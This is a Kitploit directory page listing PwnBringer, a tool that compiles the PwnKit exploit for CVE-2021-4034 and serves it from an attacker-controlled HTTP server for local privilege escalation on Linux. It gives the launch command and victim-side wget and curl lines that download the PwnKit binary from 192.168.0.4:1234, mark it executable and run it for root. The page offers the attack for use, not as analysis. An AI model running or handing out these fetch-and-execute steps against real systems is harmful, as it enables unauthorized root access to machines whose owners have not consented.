Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-4034 — Automates the compilation and serving of the PwnKit exploit for CVE-2021-4034, enabling local privilege escalation on vulnerable Linux systems. | Kitploit
Tools/GitHubGitHub/g01d3nw01f/cve-2021-4034
Privilege EscalationExploit FrameworksPayload GenerationExploitationPenetration Testing
GitHubg01d3nw01f/cve-2021-4034

CVE-2021-4034

Automates the compilation and serving of the PwnKit exploit for CVE-2021-4034, enabling local privilege escalation on vulnerable Linux systems.

View Repository
4 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

PwnBringer

auto generate and Serve Of PwnKit

compile the source code to binary for pwnkit and automaticaly python server is on,

this is ProtoType so, perhaps not work depending on the environment.

root@kitploit:~
chmod +x PwnBringer.py
./PwnBringer.py <lhost> <lport>

alt text

root@kitploit:~
[VictimSide]

user1@deb:~$ wget http://192.168.0.4:1234/PwnKit 
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit

or

user1@deb:~$ curl http://192.168.0.4:1234/PwnKit -o PwnKit
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit

alt text

Download Tool